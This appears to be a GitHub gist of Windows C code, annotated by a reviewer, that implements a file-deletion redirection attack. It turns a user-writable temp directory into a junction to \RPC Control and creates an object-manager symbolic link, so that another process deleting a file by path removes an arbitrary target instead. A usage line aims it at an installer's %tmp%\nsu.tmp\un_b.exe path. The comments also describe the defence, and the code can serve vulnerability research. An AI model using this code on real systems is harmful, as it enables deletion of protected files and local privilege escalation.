
@rbmm
Last active July 28, 2025 19:01
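/**
 * Turns the directory named by poa into an NTFS mount point (junction).
 *
 * The directory is opened, or created if it does not exist (FILE_OPEN_IF), without
 * following a reparse point that may already be on it (FILE_OPEN_REPARSE_POINT).
 * FSCTL_SET_REPARSE_POINT is then issued with an IO_REPARSE_TAG_MOUNT_POINT buffer
 * whose PathBuffer holds: SubstituteName, NUL, PrintName, NUL.
 *
 * @param poa            object attributes naming the directory
 * @param SubstituteName target of the junction, NUL-terminated
 * @param PrintName      display name stored next to the target; may be L""
 * @return the status of NtCreateFile or NtFsControlFile; STATUS_INTERNAL_ERROR when
 *         the names cannot be formatted; STATUS_NAME_TOO_LONG when they do not fit
 *         into a reparse buffer.
 */
NTSTATUS CreateMountPoint(POBJECT_ATTRIBUTES poa, PCWSTR SubstituteName, PCWSTR PrintName)
{
    /* Sizing pass: with a null buffer and a zero count _snwprintf reports how many
     * characters the formatted text needs, terminator excluded. */
    int cch = _snwprintf(0, 0, L"%ws%c%ws", SubstituteName, 0, PrintName);
    if (0 >= cch)
    {
        return STATUS_INTERNAL_ERROR;
    }

    /* Every length field of the reparse buffer is a USHORT and the whole buffer is
     * capped at MAXIMUM_REPARSE_DATA_BUFFER_SIZE. Reject longer names here instead of
     * letting the USHORT casts below truncate silently; this also bounds the alloca. */
    if ((ULONG)cch >= MAXIMUM_REPARSE_DATA_BUFFER_SIZE / sizeof(WCHAR))
    {
        return STATUS_NAME_TOO_LONG;
    }

    ULONG cb = FIELD_OFFSET(REPARSE_DATA_BUFFER, MountPointReparseBuffer.PathBuffer[cch + 1]);
    if (cb > MAXIMUM_REPARSE_DATA_BUFFER_SIZE)
    {
        return STATUS_NAME_TOO_LONG;
    }

    PREPARSE_DATA_BUFFER prdb = (PREPARSE_DATA_BUFFER)alloca(cb);

    /* Formatting pass: writes both names and the two terminators into PathBuffer. */
    if (0 >= _snwprintf(prdb->MountPointReparseBuffer.PathBuffer, cch + 1,
        L"%ws%c%ws", SubstituteName, 0, PrintName))
    {
        return STATUS_INTERNAL_ERROR;
    }

    prdb->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
    prdb->ReparseDataLength = (USHORT)(cb - offsetof(REPARSE_DATA_BUFFER, GenericReparseBuffer));
    /* alloca memory is uninitialized; do not hand stack garbage to the file system. */
    prdb->Reserved = 0;
    prdb->MountPointReparseBuffer.SubstituteNameOffset = 0;
    /* Multiply first, cast afterwards: the byte count is what has to fit a USHORT. */
    prdb->MountPointReparseBuffer.SubstituteNameLength = (USHORT)(wcslen(SubstituteName) * sizeof(WCHAR));
    /* PrintName starts right after SubstituteName and its terminating NUL. */
    prdb->MountPointReparseBuffer.PrintNameOffset =
        (USHORT)(prdb->MountPointReparseBuffer.SubstituteNameLength + sizeof(WCHAR));
    prdb->MountPointReparseBuffer.PrintNameLength = (USHORT)(wcslen(PrintName) * sizeof(WCHAR));

    HANDLE hFile;
    IO_STATUS_BLOCK iosb;

    /* The seventh argument is ShareAccess. The original passed FILE_DIRECTORY_FILE
     * there, which has the same numeric value as FILE_SHARE_READ; the correct name is
     * used here, the behavior is unchanged.
     * NOTE(review): FILE_ALL_ACCESS is broader than setting a reparse point needs -
     * confirm whether a narrower mask is acceptable for the callers. */
    NTSTATUS status = NtCreateFile(&hFile, FILE_ALL_ACCESS, poa, &iosb, 0, 0, FILE_SHARE_READ,
        FILE_OPEN_IF, FILE_OPEN_REPARSE_POINT|FILE_DIRECTORY_FILE, 0, 0);

    if (0 <= status)
    {
        status = NtFsControlFile(hFile, 0, 0, 0, &iosb, FSCTL_SET_REPARSE_POINT, prdb, cb, 0, 0);
        NtClose(hFile);
    }

    return status;
}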
/**
 * Creates an object-manager symbolic link named pcsz that points at a file.
 *
 * pszFileName is a DOS-style path; it is converted to an NT path with
 * RtlDosPathNameToNtPathName_U_WithStatus and used as the link target. The link is
 * created without OBJ_PERMANENT, so its lifetime is tied to the returned handle.
 *
 * @param SymbolicLinkHandle receives the handle of the new link; only meaningful when
 *                           the function succeeds
 * @param pcsz               object-manager name of the link
 * @param pszFileName        DOS path of the link target
 * @return status of the path conversion or of ZwCreateSymbolicLinkObject
 */
NTSTATUS CreateSymLink(PHANDLE SymbolicLinkHandle, PCWSTR pcsz, PCWSTR pszFileName)
{
    UNICODE_STRING TargetName;
    NTSTATUS status = RtlDosPathNameToNtPathName_U_WithStatus(pszFileName, &TargetName, 0, 0);

    /* Nothing was allocated when the conversion fails, so there is nothing to free. */
    if (0 > status)
    {
        return status;
    }

    UNICODE_STRING ObjectName;
    RtlInitUnicodeString(&ObjectName, pcsz);

    OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, &ObjectName, OBJ_CASE_INSENSITIVE };

    status = ZwCreateSymbolicLinkObject(SymbolicLinkHandle, SYMBOLIC_LINK_ALL_ACCESS, &oa, &TargetName);

    /* The converted path was allocated by the Rtl routine and is released on both
     * outcomes of the create call. */
    RtlFreeUnicodeString(&TargetName);

    return status;
}
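/**
 * Shows how a delete-by-path of pszSrcFile can end up removing pszTargetFile.
 *
 * Sequence, as implemented below:
 *   1. pszSrcFile is converted to an NT path and split into directory and file name.
 *   2. The directory is made a junction to "\RPC Control" (CreateMountPoint).
 *   3. An object-manager symbolic link "\RPC Control\<file name>" is created that
 *      points at pszTargetFile (CreateSymLink).
 *   4. DeleteFileW(pszSrcFile) is called. The author's markers state that this step
 *      belongs to another process; it is inlined here for demonstration.
 *   5. The link handle is closed and the junction directory is removed.
 *
 * Defensive reading: a component that deletes files by path inside a directory that
 * another user can write to resolves the path through whatever that user placed there.
 * Such code should open the file without following reparse points, check that the
 * opened object is the expected one, and delete through that handle, or keep its
 * temporary files in a directory other users cannot modify.
 *
 * @param pszSrcFile    DOS path whose final component is the file name to redirect
 * @param pszTargetFile DOS path the redirected name resolves to
 * @return status of the first failing step; STATUS_OBJECT_NAME_INVALID when
 *         pszSrcFile has no file-name component; STATUS_INTERNAL_ERROR when the link
 *         name cannot be formatted.
 */
NTSTATUS Delete2(PCWSTR pszSrcFile, PCWSTR pszTargetFile)
{
    UNICODE_STRING ObjectName;
    PWSTR pszFileName;

    NTSTATUS status = RtlDosPathNameToNtPathName_U_WithStatus(pszSrcFile, &ObjectName, &pszFileName, 0);
    if (0 > status)
    {
        return status;
    }

    /* The file-part pointer may come back null (for example when the path names a
     * directory). The original wrote to pszFileName[-1] unconditionally. */
    if (!pszFileName || pszFileName <= ObjectName.Buffer)
    {
        RtlFreeUnicodeString(&ObjectName);
        return STATUS_OBJECT_NAME_INVALID;
    }

    /* Cut the path at the separator in front of the file name, so that ObjectName
     * names the parent directory only. Buffer still points at the same allocation and
     * is released by RtlFreeUnicodeString at the end. */
    pszFileName[-1] = 0;
    RtlInitUnicodeString(&ObjectName, ObjectName.Buffer);

    OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, &ObjectName };

    if (0 <= (status = CreateMountPoint(&oa, L"\\RPC Control", L"")))
    {
        status = STATUS_INTERNAL_ERROR;

        /* Sizing pass, then formatting pass into a stack buffer of exactly that size. */
        int cch = _snwprintf(0, 0, L"\\RPC Control\\%ws", pszFileName);

        if (0 < cch)
        {
            PWSTR psz = (PWSTR)alloca(((size_t)cch + 1) * sizeof(WCHAR));

            if (0 < _snwprintf(psz, (size_t)cch + 1, L"\\RPC Control\\%ws", pszFileName))
            {
                HANDLE hSymLink;
                if (0 <= (status = CreateSymLink(&hSymLink, psz, pszTargetFile)))
                {
                    //////////////////////////////////////////////////////////////////////////
                    //++ in another process
                    if (!DeleteFileW(pszSrcFile))
                    {
                        status = RtlGetLastNtStatus();
                    }
                    //-- in another process
                    //////////////////////////////////////////////////////////////////////////

                    /* Closing the handle ends the lifetime of the link object. */
                    NtClose(hSymLink);
                }
            }
        }

        /* Cleanup, executed whatever happened above: open the junction itself (not
         * its target) with delete-on-close, so that closing the handle removes it. */
        HANDLE hFile;
        IO_STATUS_BLOCK iosb;
        if (0 <= NtOpenFile(&hFile, DELETE, &oa, &iosb, 0,
            FILE_DELETE_ON_CLOSE|FILE_DIRECTORY_FILE|FILE_OPEN_REPARSE_POINT))
        {
            NtClose(hFile);
        }
    }

    RtlFreeUnicodeString(&ObjectName);

    return status;
}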
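/**
 * Expands environment variables in pszSrcFile and passes the result to Delete2.
 *
 * @param pszSrcFile    path that may contain %VARIABLE% references
 * @param pszTargetFile passed to Delete2 unchanged
 * @return the status returned by Delete2; STATUS_BUFFER_TOO_SMALL when the expanded
 *         text grew between the sizing and the expanding call; otherwise a failure
 *         NTSTATUS describing why the expansion failed.
 */
NTSTATUS Delete2Ex(PCWSTR pszSrcFile, PCWSTR pszTargetFile)
{
    /* Sizing call: returns the required size in characters, terminator included. */
    ULONG cch = ExpandEnvironmentStringsW(pszSrcFile, 0, 0);

    if (cch)
    {
        PWSTR psz = (PWSTR)alloca(cch * sizeof(WCHAR));

        ULONG cchUsed = ExpandEnvironmentStringsW(pszSrcFile, psz, cch);

        if (cchUsed)
        {
            /* A result larger than the buffer means the environment changed between
             * the two calls; the buffer content is then not a complete path. The
             * original passed it on to Delete2 regardless. */
            if (cchUsed > cch)
            {
                return STATUS_BUFFER_TOO_SMALL;
            }

            return Delete2(psz, pszTargetFile);
        }
    }

    /* The original returned GetLastError() here. A Win32 error code is a small
     * positive number and therefore looks like success to a caller that tests
     * 0 <= status. Report an NTSTATUS instead, the way Delete2 does after DeleteFileW,
     * and never let a stale success value through. */
    NTSTATUS status = RtlGetLastNtStatus();

    return 0 > status ? status : STATUS_UNSUCCESSFUL;
}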
// Usage example from the gist (it belongs inside a function body). Delete2Ex expands
// %tmp%; Delete2 then treats "nsu.tmp" under that directory as the directory to turn
// into a junction and "un_b.exe" as the file name to redirect. "bbb.txt" is a relative
// path and is resolved when CreateSymLink converts it to an NT path.
// NOTE(review): the return value is ignored here - check it when adapting the example.
Delete2Ex(L"%tmp%\\nsu.tmp\\un_b.exe", L"bbb.txt");